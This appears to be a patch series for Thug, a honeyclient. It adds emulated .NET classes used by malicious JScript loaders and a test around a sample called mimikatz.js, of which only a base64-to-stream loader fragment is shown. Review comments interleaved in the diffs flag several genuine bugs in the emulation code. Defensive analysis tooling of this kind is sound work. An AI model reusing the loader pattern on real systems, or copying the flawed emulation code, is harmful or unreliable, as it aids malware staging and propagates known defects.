From 631acad7b95b0c089aa6ee3c04ce44d850144fbd Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:34:40 +0100
Subject: [PATCH 01/12] [ActiveX][.NET API] System.Text.ASCIIEncoding
---
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py | 11 +++++++++++
 thug/ActiveX/modules/System/Text/__init__.py | 5 +++++
 2 files changed, 16 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Text/ASCIIEncoding.py
 create mode 100644 thug/ActiveX/modules/System/Text/__init__.py
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
new file mode 100644
index 0000000000..a142552f5e
--- /dev/null
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -0,0 +1,11 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def GetByteCount_2(self, chars):
+ return len(chars.encode("utf-8"))
+
+
+def GetBytes_4(self, chars):
+ return list(chars)
diff --git a/thug/ActiveX/modules/System/Text/__init__.py b/thug/ActiveX/modules/System/Text/__init__.py
new file mode 100644
index 0000000000..a41479af82
--- /dev/null
+++ b/thug/ActiveX/modules/System/Text/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "ASCIIEncoding",
+]
+
+from . import ASCIIEncoding
From e68068263946cc9005790288c29b5f7ccdbfb927 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:36:03 +0100
Subject: [PATCH 02/12] [ActiveX][.NET API] System.Collections.ArrayList
---
 thug/ActiveX/modules/System/Collections/ArrayList.py | 12 ++++++++++++
 thug/ActiveX/modules/System/Collections/__init__.py | 5 +++++
 2 files changed, 17 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Collections/ArrayList.py
 create mode 100644 thug/ActiveX/modules/System/Collections/__init__.py
diff --git a/thug/ActiveX/modules/System/Collections/ArrayList.py b/thug/ActiveX/modules/System/Collections/ArrayList.py
new file mode 100644
index 0000000000..59d33b958e
--- /dev/null
+++ b/thug/ActiveX/modules/System/Collections/ArrayList.py
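Review bot: `GetByteCount_2` returns the UTF-8 byte length, `len(chars.encode("utf-8"))`, but the class being emulated is ASCIIEncoding, which yields exactly one byte per char (non-ASCII chars become `?`), so for any non-ASCII input the count exceeds the length of the list `GetBytes_4` returns, and if `chars` carries a lone surrogate, which a JScript string can, `encode("utf-8")` raises `UnicodeEncodeError` from inside the emulated method. `count = len(chars)` matches .NET here and keeps the `buffer[offset : offset + count]` slice in TransformFinalBlock consistent with `list(chars)`; for the base64 text the mimikatz sample feeds in, the two counts presumably agree, so the 20164 pinned by `test_Mimikatz` should be unaffected. `GetBytes_4` returning a list of one-character strings rather than bytes works because TransformFinalBlock joins it back, but that contract deserves a comment such as `# returns single-character strings, not bytes; TransformFinalBlock re-joins them`.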
@@ -0,0 +1,12 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def Add(self, value):
+ self.arraylist.append(value)
+ return self.arraylist.index(value)
+
+
+def ToArray(self):
+ return list(self.arraylist)
diff --git a/thug/ActiveX/modules/System/Collections/__init__.py b/thug/ActiveX/modules/System/Collections/__init__.py
new file mode 100644
index 0000000000..2adc3a95ad
--- /dev/null
+++ b/thug/ActiveX/modules/System/Collections/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "ArrayList",
+]
+
+from . import ArrayList
From 9ee6f5c25c9d8782be379b8a7ac4aa6fc34bc373 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:36:29 +0100
Subject: [PATCH 03/12] [ActiveX][.NET API] System.IO.MemoryStream
---
 thug/ActiveX/modules/System/IO/MemoryStream.py | 15 +++++++++++++++
 thug/ActiveX/modules/System/IO/__init__.py | 5 +++++
 2 files changed, 20 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/IO/MemoryStream.py
 create mode 100644 thug/ActiveX/modules/System/IO/__init__.py
diff --git a/thug/ActiveX/modules/System/IO/MemoryStream.py b/thug/ActiveX/modules/System/IO/MemoryStream.py
new file mode 100644
index 0000000000..b22fc1ef43
--- /dev/null
+++ b/thug/ActiveX/modules/System/IO/MemoryStream.py
@@ -0,0 +1,15 @@
+import io
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def Write(self, buffer, offset=0, count=-1):
+ buflen = count if count > -1 else len(buffer)
+ bufdat = buffer[: buflen - 1]
+
+ streamdata = self.stream.getvalue()
+ data = f"{streamdata[:offset]}{bufdat}{streamdata[offset:]}"
+
+ self.stream = io.BytesIO(data.encode())
+ self.Position = len(data)
diff --git a/thug/ActiveX/modules/System/IO/__init__.py b/thug/ActiveX/modules/System/IO/__init__.py
new file mode 100644
index 0000000000..f764e2f7af
--- /dev/null
+++ b/thug/ActiveX/modules/System/IO/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "MemoryStream",
+]
+
+from . import MemoryStream
From 799680c2bf5304bc2880c254597a1b00c25f07a2 Mon Sep 17 00:00:00 2001
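Review bot: `Add` returns `self.arraylist.index(value)`, which is the index of the first element equal to `value`, not the index the element was just appended at, so adding a duplicate (the list is filled with script-controlled values) reports a stale position, and `index` is an O(n) scan on every call. .NET's `ArrayList.Add` returns the index of the new element; `self.arraylist.append(value)` followed by `return len(self.arraylist) - 1` gives exactly that.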
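Review bot: `Write` assembles the new content with an f-string over two `bytes` values — `self.stream.getvalue()` is bytes (the stream is an `io.BytesIO`, as the `self.stream = io.BytesIO(...)` line below shows) and `buffer` is `bytes` whenever the caller passes on what `TransformFinalBlock` returns, the obvious flow in the sample's `base64ToStream` — so both are interpolated as their `repr` and `data.encode()` stores that `b'...'` text instead of the payload. `buffer[: buflen - 1]` also drops the last element, and `offset` is applied to the stream where .NET's `Write(buffer, offset, count)` applies it to `buffer` and writes at the current `Position` (initialised to 0 in the CLSID.py entry added later in this series). The rewrite below slices `buffer`, writes at `Position` and keeps bytes throughout; it assumes `buffer` is bytes-like, so a caller handing over the list of one-character strings from `GetBytes_4` would need `"".join(...).encode()` first.
```python
def Write(self, buffer, offset=0, count=-1):
    end = len(buffer) if count < 0 else offset + count
    chunk = bytes(buffer[offset:end])
    current = self.stream.getvalue()
    pos = self.Position
    data = current[:pos] + chunk + current[pos + len(chunk):]
    self.stream = io.BytesIO(data)
    self.Position = pos + len(chunk)
```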
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:37:07 +0100
Subject: [PATCH 04/12] [ActiveX][.NET API] System.Runtime
---
 thug/ActiveX/modules/System/Runtime/Activator.py | 11 +++++++++++
 thug/ActiveX/modules/System/Runtime/Delegate.py | 14 ++++++++++++++
 .../Formatters/Binary/BinaryFormatter.py | 10 ++++++++++
 .../Serialization/Formatters/Binary/__init__.py | 5 +++++
 .../Runtime/Serialization/Formatters/__init__.py | 5 +++++
 .../System/Runtime/Serialization/__init__.py | 5 +++++
 thug/ActiveX/modules/System/Runtime/__init__.py | 5 +++++
 7 files changed, 55 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Runtime/Activator.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Delegate.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Runtime/__init__.py
diff --git a/thug/ActiveX/modules/System/Runtime/Activator.py b/thug/ActiveX/modules/System/Runtime/Activator.py
new file mode 100644
index 0000000000..adeb438062
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Activator.py
@@ -0,0 +1,11 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+
+class Activator:
+ def __init__(self, delegate):
+ self.delegate = delegate
+
+ def CreateInstance(self, Type):
+ pass
diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
new file mode 100644
index 0000000000..37b12b8677
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -0,0 +1,14 @@
+import logging
+
+from .Activator import Activator
+
+log = logging.getLogger("Thug")
+
+
+class Delegate:
+ def __init__(self, code):
+ self.code = code
+
+ def DynamicInvoke(self, args):
+ log.warning(self.code.decode())
+ return Activator(self)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
new file mode 100644
index 0000000000..411bcee3ab
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -0,0 +1,10 @@
+import logging
+
+log = logging.getLogger("Thug")
+
+from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
+
+
+def Deserialize_2(self, buf):
+ data = buf.stream.getvalue()
+ return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
new file mode 100644
index 0000000000..859320ae0f
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "BinaryFormatter",
+]
+
+from . import BinaryFormatter
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
new file mode 100644
index 0000000000..99b57c870f
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "Binary",
+]
+
+from . import Binary
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py b/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
new file mode 100644
index 0000000000..1434bd5600
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "Formatters",
+]
+
+from . import Formatters
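Review bot: `DynamicInvoke` calls `self.code.decode()` on the raw bytes that `Deserialize_2` (same patch) reads out of the MemoryStream, and a BinaryFormatter payload is typically binary, so strict UTF-8 decoding can raise `UnicodeDecodeError` from inside an emulated method and abort the run on precisely the samples this emulation exists for; dumping the whole payload at WARNING is also noisy. Later patches in this series comment the line out (PATCH 07) and then delete it together with the logger (PATCH 10), which leaves `DynamicInvoke` and `CreateInstance` with no behaviour record at all while every other new method gains one. Recording the event and the size instead, `log.ThugLogging.add_behavior_warn(f"[System.Runtime.Delegate] DynamicInvoke (code length = {len(self.code)})")`, keeps the trace an analyst needs without touching the payload's encoding. `args` is accepted and ignored; a one-line comment saying so would stop it reading as an omission.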
diff --git a/thug/ActiveX/modules/System/Runtime/__init__.py b/thug/ActiveX/modules/System/Runtime/__init__.py
new file mode 100644
index 0000000000..afd4db59fd
--- /dev/null
+++ b/thug/ActiveX/modules/System/Runtime/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "Serialization",
+]
+
+from . import Serialization
From a808238e0bb51d356a20ef23a4aa74bde3c2ee8b Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:37:44 +0100
Subject: [PATCH 05/12] [ActiveX][.NET API] System.Cryptography.FromBase64Transform
---
 .../System/Security/Cryptography/FromBase64Transform.py | 8 ++++++++
 .../modules/System/Security/Cryptography/__init__.py | 5 +++++
 thug/ActiveX/modules/System/Security/__init__.py | 5 +++++
 3 files changed, 18 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
 create mode 100644 thug/ActiveX/modules/System/Security/Cryptography/__init__.py
 create mode 100644 thug/ActiveX/modules/System/Security/__init__.py
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
new file mode 100644
index 0000000000..abc7362ce3
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -0,0 +1,8 @@
+import base64
+import logging
+
+log = logging.getLogger("Thug")
+
+
+def TransformFinalBlock(self, buffer, offset, count):
+ return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/__init__.py b/thug/ActiveX/modules/System/Security/Cryptography/__init__.py
new file mode 100644
index 0000000000..3a892aa95b
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/Cryptography/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "FromBase64Transform",
+]
+
+from . import FromBase64Transform
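Review bot: `base64.b64decode` raises `binascii.Error` on bad padding or a wrong length, and the input here comes straight from the analysed script, so a malformed or truncated blob aborts the whole run with a traceback instead of a logged event; the outer `bytes(...)` is a no-op since `b64decode` already returns `bytes`, and `"".join(buffer[...])` only works when `buffer` is the list of one-character strings from `GetBytes_4`, a `bytes` argument raising `TypeError`. The rewrite below accepts both shapes and turns a decode failure into a warning plus an empty result; it needs `import binascii` next to `import base64`.
```python
def TransformFinalBlock(self, buffer, offset, count):
    chunk = buffer[offset : offset + count]
    encoded = chunk if isinstance(chunk, (bytes, bytearray)) else "".join(chunk)
    try:
        return base64.b64decode(encoded)
    except binascii.Error:
        log.warning("[System.Security.Cryptography.FromBase64Transform] invalid base64 input")
        return b""
```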
diff --git a/thug/ActiveX/modules/System/Security/__init__.py b/thug/ActiveX/modules/System/Security/__init__.py
new file mode 100644
index 0000000000..7535a16722
--- /dev/null
+++ b/thug/ActiveX/modules/System/Security/__init__.py
@@ -0,0 +1,5 @@
+__all__ = [
+ "Cryptography",
+]
+
+from . import Cryptography
From e1967ce4e19a99f50404b61181a61157608224d1 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:39:06 +0100
Subject: [PATCH 06/12] [ActiveX][.NET API] System
---
 thug/ActiveX/CLSID.py | 60 +++++++++++++++++++++++++
 thug/ActiveX/modules/System/__init__.py | 7 +++
 2 files changed, 67 insertions(+)
 create mode 100644 thug/ActiveX/modules/System/__init__.py
diff --git a/thug/ActiveX/CLSID.py b/thug/ActiveX/CLSID.py
index b5e482bf7e..296ed660fa 100644
--- a/thug/ActiveX/CLSID.py
+++ b/thug/ActiveX/CLSID.py
@@ -16,6 +16,8 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston,
 # MA 02111-1307 USA
+import io
+
 from .modules import AcroPDF
 from .modules import AdodbRecordset
 from .modules import AdodbStream
@@ -94,6 +96,7 @@
 from .modules import StormMps
 from .modules import SymantecAppStream
 from .modules import SymantecBackupExec
+from .modules import System
 from .modules import StreamAudioChainCast
 from .modules import Toshiba
 from .modules import UniversalUpload
@@ -1288,6 +1291,63 @@
 "Set_MonthText11": SymantecBackupExec.Set_MonthText11,
 },
 },
+ # System.Collections.ArrayList
+ {
+ "id": (),
+ "name": ("system.collections.arraylist",),
+ "attrs": {
+ "arraylist": [],
+ },
+ "funcattrs": {},
+ "methods": {
+ "Add": System.Collections.ArrayList.Add,
+ "ToArray": System.Collections.ArrayList.ToArray,
+ },
+ },
+ # System.IO.MemoryStream
+ {
+ "id": (),
+ "name": ("system.io.memorystream",),
+ "attrs": {
+ "stream": io.BytesIO(),
+ "Position": 0,
+ },
+ "funcattrs": {},
+ "methods": {
+ "Write": System.IO.MemoryStream.Write,
+ },
+ },
+ # System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
+ {
+ "id": (),
+ "name": ("system.runtime.serialization.formatters.binary.binaryformatter",),
+ "attrs": {},
+ "funcattrs": {},
+ "methods": {
+ "Deserialize_2": System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize_2,
+ },
+ },
+ # System.Security.Cryptography.FromBase64Transform
+ {
+ "id": (),
+ "name": ("system.security.cryptography.frombase64transform",),
+ "attrs": {},
+ "funcattrs": {},
+ "methods": {
+ "TransformFinalBlock": System.Security.Cryptography.FromBase64Transform.TransformFinalBlock,
+ },
+ },
+ # System.Text.ASCIIEncoding
+ {
+ "id": (),
+ "name": ("system.text.asciiencoding",),
+ "attrs": {},
+ "funcattrs": {},
+ "methods": {
+ "GetByteCount_2": System.Text.ASCIIEncoding.GetByteCount_2,
+ "GetBytes_4": System.Text.ASCIIEncoding.GetBytes_4,
+ },
+ },
 # StreamAudioChainCast
 {
 "id": ("2253F320-AB68-4A07-917D-4F12D8884A06",),
diff --git a/thug/ActiveX/modules/System/__init__.py b/thug/ActiveX/modules/System/__init__.py
new file mode 100644
index 0000000000..fdbcdafd17
--- /dev/null
+++ b/thug/ActiveX/modules/System/__init__.py
@@ -0,0 +1,7 @@
+__all__ = ["Collections", "IO", "Runtime", "Security", "Text"]
+
+from . import Collections
+from . import IO
+from . import Runtime
+from . import Security
+from . import Text
From 656a9f05c2c80323939c185ee81308a2ee8eebd2 Mon Sep 17 00:00:00 2001
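Review bot: the `attrs` values `"arraylist": []` and `"stream": io.BytesIO()` in the new `system.collections.arraylist` and `system.io.memorystream` entries are created once, when CLSID.py is imported, so unless the ActiveX object factory deep-copies `attrs` for every instantiation (not visible here) every ArrayList object created in the process appends to the same list and `ToArray` on a later page returns entries left by an earlier one — state leaking across analysed samples, in the test session as much as in a long-running deployment. `MemoryStream.Write` happens to rebind `self.stream` to a fresh `BytesIO` on every call, so the shared stream is only ever read while empty, but `ArrayList.Add` mutates in place. Worth confirming how the loader copies `attrs`; if the copy is shallow, it should `copy.deepcopy` them before binding, or `Add` should create the list on first use rather than rely on this table.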
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:57:44 +0100
Subject: [PATCH 07/12] Minor change
---
 thug/ActiveX/modules/System/Runtime/Delegate.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
index 37b12b8677..8420e4ceb3 100644
--- a/thug/ActiveX/modules/System/Runtime/Delegate.py
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -10,5 +10,5 @@ def __init__(self, code):
 self.code = code
 def DynamicInvoke(self, args):
- log.warning(self.code.decode())
+ # log.warning(self.code.decode())
 return Activator(self)
From 9f2818a3820347f170a3f16fbaa0a74d4b2658fd Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Mon, 11 Mar 2024 14:58:21 +0100
Subject: [PATCH 08/12] [Unit tests] Add sample mimikatz.js
---
 tests/functional/test_exploits.py | 13 ++
 tests/samples/exploits/mimikatz.js | 306 +++++++++++++++++++++++++++++
 2 files changed, 319 insertions(+)
 create mode 100644 tests/samples/exploits/mimikatz.js
diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index 56efe0be33..9837ca85ca 100644
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1438,3 +1438,16 @@ def test_Qakbot(self, caplog):
 ]
 self.do_perform_test(caplog, sample, expected, useragent="osx10chrome97")
+
+ def test_Mimikatz(self, caplog):
+ sample = os.path.join(self.exploits_path, "mimikatz.js")
+ expected = [
+ "ActiveXObject: system.text.asciiencoding",
+ "[System.Text.ASCIIEncoding.GetByteCount_2] length = 20164",
+ "ActiveXObject: system.security.cryptography.frombase64transform",
+ "ActiveXObject: system.io.memorystream",
+ "ActiveXObject: system.runtime.serialization.formatters.binary.binaryformatter",
+ "ActiveXObject: system.collections.arraylist",
+ ]
+
+ self.do_perform_test(caplog, sample, expected)
diff --git a/tests/samples/exploits/mimikatz.js b/tests/samples/exploits/mimikatz.js
new file mode 100644
index 0000000000..1305ca9343
--- /dev/null
+++ b/tests/samples/exploits/mimikatz.js
@@ -0,0 +1,306 @@
+
From 8abdc5e2b927d498b87440fd7e0f677782b5bc05 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Tue, 12 Mar 2024 08:20:06 +0100
Subject: [PATCH 09/12] Minor linting change
---
 .../Serialization/Formatters/Binary/BinaryFormatter.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index 411bcee3ab..ec82b141ad 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -1,9 +1,9 @@
 import logging
-log = logging.getLogger("Thug")
-
 from thug.ActiveX.modules.System.Runtime.Delegate import Delegate
+log = logging.getLogger("Thug")
+
 def Deserialize_2(self, buf):
 data = buf.stream.getvalue()
From 2ef783b7f307fc6218ce9afac259ec03c88157f4 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Wed, 10 Apr 2024 12:40:59 +0200
Subject: [PATCH 10/12] Increase logging verbosity
---
 tests/functional/test_exploits.py | 8 +++++++-
 tests/samples/exploits/mimikatz.js | 1 -
 thug/ActiveX/modules/System/Collections/ArrayList.py | 2 ++
 thug/ActiveX/modules/System/IO/MemoryStream.py | 2 ++
 thug/ActiveX/modules/System/Runtime/Activator.py | 5 -----
 thug/ActiveX/modules/System/Runtime/Delegate.py | 5 -----
 .../Serialization/Formatters/Binary/BinaryFormatter.py | 2 ++
 .../System/Security/Cryptography/FromBase64Transform.py | 1 +
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py | 5 ++++-
 9 files changed, 18 insertions(+), 13 deletions(-)
diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index 9837ca85ca..c82d725a4b 100644
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1443,11 +1443,17 @@ def test_Mimikatz(self, caplog):
 sample = os.path.join(self.exploits_path, "mimikatz.js")
 expected = [
 "ActiveXObject: system.text.asciiencoding",
- "[System.Text.ASCIIEncoding.GetByteCount_2] length = 20164",
+ "[System.Text.ASCIIEncoding] GetByteCount_2 count = 20164",
+ "[System.Text.ASCIIEncoding.GetBytes_4]",
 "ActiveXObject: system.security.cryptography.frombase64transform",
+ "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock",
 "ActiveXObject: system.io.memorystream",
+ "[System.IO.MemoryStream] Write",
 "ActiveXObject: system.runtime.serialization.formatters.binary.binaryformatter",
 "ActiveXObject: system.collections.arraylist",
+ "[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2",
+ "[System.Collections.ArrayList] Add",
+ "[System.Collections.ArrayList] ToArray",
 ]
 self.do_perform_test(caplog, sample, expected)
diff --git a/tests/samples/exploits/mimikatz.js b/tests/samples/exploits/mimikatz.js
index 1305ca9343..6cebe5a999 100644
--- a/tests/samples/exploits/mimikatz.js
+++ b/tests/samples/exploits/mimikatz.js
@@ -10,7 +10,6 @@ function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); - alert("[System.Text.ASCIIEncoding.GetByteCount_2] length = " + length); var ba = enc.GetBytes_4(b); var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); ba = transform.TransformFinalBlock(ba, 0, length);
diff --git a/thug/ActiveX/modules/System/Collections/ArrayList.py b/thug/ActiveX/modules/System/Collections/ArrayList.py
index 59d33b958e..1daeb8c7b2 100644
--- a/thug/ActiveX/modules/System/Collections/ArrayList.py
+++ b/thug/ActiveX/modules/System/Collections/ArrayList.py
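Review bot: the expected string `"[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock"` spells the class `FromBase64ToTransform`, and this test pins that spelling although the ActiveX name on the line above it is `system.security.cryptography.frombase64transform`; the message is emitted with the same typo by `TransformFinalBlock` in this patch's FromBase64Transform.py hunk and survives the reformatting in PATCH 12. Anyone grepping behaviour logs for the real .NET type name will miss the event, so change both sides to `"[System.Security.Cryptography.FromBase64Transform] TransformFinalBlock"`.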
@@ -4,9 +4,11 @@
 def Add(self, value):
+ log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] Add")
 self.arraylist.append(value)
 return self.arraylist.index(value)
 def ToArray(self):
+ log.ThugLogging.add_behavior_warn("[System.Collections.ArrayList] ToArray")
 return list(self.arraylist)
diff --git a/thug/ActiveX/modules/System/IO/MemoryStream.py b/thug/ActiveX/modules/System/IO/MemoryStream.py
index b22fc1ef43..d996afe7e8 100644
--- a/thug/ActiveX/modules/System/IO/MemoryStream.py
+++ b/thug/ActiveX/modules/System/IO/MemoryStream.py
@@ -5,6 +5,8 @@
 def Write(self, buffer, offset=0, count=-1):
+ log.ThugLogging.add_behavior_warn("[System.IO.MemoryStream] Write")
+
 buflen = count if count > -1 else len(buffer)
 bufdat = buffer[: buflen - 1]
diff --git a/thug/ActiveX/modules/System/Runtime/Activator.py b/thug/ActiveX/modules/System/Runtime/Activator.py
index adeb438062..3f26ff6fa7 100644
--- a/thug/ActiveX/modules/System/Runtime/Activator.py
+++ b/thug/ActiveX/modules/System/Runtime/Activator.py
@@ -1,8 +1,3 @@
-import logging
-
-log = logging.getLogger("Thug")
-
-
 class Activator:
 def __init__(self, delegate):
 self.delegate = delegate
diff --git a/thug/ActiveX/modules/System/Runtime/Delegate.py b/thug/ActiveX/modules/System/Runtime/Delegate.py
index 8420e4ceb3..358d9a0f55 100644
--- a/thug/ActiveX/modules/System/Runtime/Delegate.py
+++ b/thug/ActiveX/modules/System/Runtime/Delegate.py
@@ -1,14 +1,9 @@
-import logging
-
 from .Activator import Activator
-log = logging.getLogger("Thug")
-
 class Delegate:
 def __init__(self, code):
 self.code = code
 def DynamicInvoke(self, args):
- # log.warning(self.code.decode())
 return Activator(self)
diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index ec82b141ad..163a796206 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
+++ b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
@@ -6,5 +6,7 @@
 def Deserialize_2(self, buf):
+ log.ThugLogging.add_behavior_warn("[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2")
+
 data = buf.stream.getvalue()
 return Delegate(data)
diff --git a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
index abc7362ce3..73e91d30b5 100644
--- a/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
+++ b/thug/ActiveX/modules/System/Security/Cryptography/FromBase64Transform.py
@@ -5,4 +5,5 @@
 def TransformFinalBlock(self, buffer, offset, count):
+ log.ThugLogging.add_behavior_warn("[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock")
 return bytes(base64.b64decode("".join(buffer[offset : offset + count])))
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index a142552f5e..f6abf55042 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -4,8 +4,11 @@
 def GetByteCount_2(self, chars):
- return len(chars.encode("utf-8"))
+ count = len(chars.encode("utf-8"))
+ log.ThugLogging.add_behavior_warn(f"[System.Text.ASCIIEncoding.GetByteCount_2] count = {count}")
+ return count
 def GetBytes_4(self, chars):
+ log.ThugLogging.add_behavior_warn("[System.Text.ASCIIEncoding] GetBytes_4")
 return list(chars)
From 5e16c89bfeeadcf82214488cfdf559a53787ec7f Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera
Date: Wed, 10 Apr 2024 15:57:45 +0200
Subject: [PATCH 11/12] Minor fixes
---
 tests/functional/test_exploits.py | 2 +-
 thug/ActiveX/modules/System/Text/ASCIIEncoding.py | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/tests/functional/test_exploits.py b/tests/functional/test_exploits.py
index c82d725a4b..b0d4eaee79 100644
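Review bot: `Deserialize_2` now records that it was called but nothing about the object it was handed, although the bytes read from `buf.stream` are the decoded stage that every later step of the sample builds on and are what an analyst would want to pivot on. Moving the call below `data = buf.stream.getvalue()` and including the size, `log.ThugLogging.add_behavior_warn(f"[System.Runtime.Serialization.Formatters.Binary.BinaryFormatter] Deserialize_2 (data length = {len(data)})")`, costs nothing. Whether `test_Mimikatz` matches its expected strings by prefix or by exact equality is not visible here; if exact, its expectation needs the same edit.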
--- a/tests/functional/test_exploits.py
+++ b/tests/functional/test_exploits.py
@@ -1444,7 +1444,7 @@ def test_Mimikatz(self, caplog):
 expected = [
 "ActiveXObject: system.text.asciiencoding",
 "[System.Text.ASCIIEncoding] GetByteCount_2 count = 20164",
- "[System.Text.ASCIIEncoding.GetBytes_4]",
+ "[System.Text.ASCIIEncoding] GetBytes_4",
 "ActiveXObject: system.security.cryptography.frombase64transform",
 "[System.Security.Cryptography.FromBase64ToTransform] TransformFinalBlock",
 "ActiveXObject: system.io.memorystream",
diff --git a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
index f6abf55042..b69eb0f29b 100644
--- a/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
+++ b/thug/ActiveX/modules/System/Text/ASCIIEncoding.py
@@ -5,7 +5,7 @@
 def GetByteCount_2(self, chars):
